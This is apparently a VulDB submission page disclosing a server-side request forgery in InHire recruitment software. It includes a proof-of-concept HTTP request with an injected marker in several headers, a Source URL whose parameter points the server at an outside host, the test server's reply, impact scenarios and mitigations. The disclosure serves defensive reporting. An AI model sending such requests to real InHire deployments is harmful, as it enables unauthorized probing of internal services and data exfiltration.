| Title | Intera Group INHIRE SOFTWARE RECRUITMENT AND SELECTION - HR Unknown SSRF via HTTP Headers |
|---|
| Description | Title: InHire Recruitment Software – External SSRF via Malicious HTTP Header Injection
Summary:
InHire is a recruitment and selection software developed by the company InHire, part of the Inter group. During a security assessment, an external Server-Side Request Forgery (SSRF) vulnerability was discovered. The application processes manipulated HTTP headers in a way that allows an attacker to force the backend to initiate HTTP requests to arbitrary external servers. While this does not expose internal assets directly, it may still be leveraged in advanced exploitation scenarios.
LINK OF PoC: https://drive.google.com/file/d/1-doSYzFeLaKtd_b6RmpBtZ5qtsvu4gYI/view?usp=sharing
Proof-of-Concept Request:
GET /?29chcotoo9=1 HTTP/1.1
Host: x.x.x.x:8000
Accept-Encoding: gzip, deflate, br, 29chcotoo9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, text/29chcotoo9
Accept-Language: en-US,29chcotoo9;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 29chcotoo9
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: "Chromium";v="136", "Not;A=Brand";v="24", "Google Chrome";v="136"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Origin: https://www.inhire.com.br
Response from attacker's test server:
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 13:51:18 GMT
Server: BaseHTTP/0.6 Python/3.9.2
Content-Length: 37
Content-Type: text/plain; charset=utf-8
Connection: close
PoC SSRF IN INHIRE, YOU ARE VULNERABLE TO SSRF!!!
Potential Impact Scenarios:
Impact Details
Access to internal services Can be adapted to reach internal APIs, databases, Redis, etc.
Bypass of network restrictions May reach endpoints that only accept internal requests.
Data exfiltration Server response may leak sensitive data or can be abused for tunneling.
Attack escalation Can be chained with other vulnerabilities to escalate access or pivot.
Recommended Mitigations:
Restrict outbound traffic to known safe destinations.
Sanitize and validate HTTP headers thoroughly.
Enable outbound request logging and monitoring.
Enforce allowlists for external HTTP targets.
|
|---|
| Source | ⚠️ https://X.X.X.com.br/?29chcotoo9=http://xxx.xx.xxx.xxx:8000/ |
|---|
| User | Samuel Jesus (UID 81288) |
|---|
| Submission | 05/30/2025 18:40 (1 Year ago) |
|---|
| Moderation | 06/15/2025 20:21 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 312613 [Intera InHire up to 20250530 29chcotoo9 server-side request forgery] |
|---|
| Points | 20 |
|---|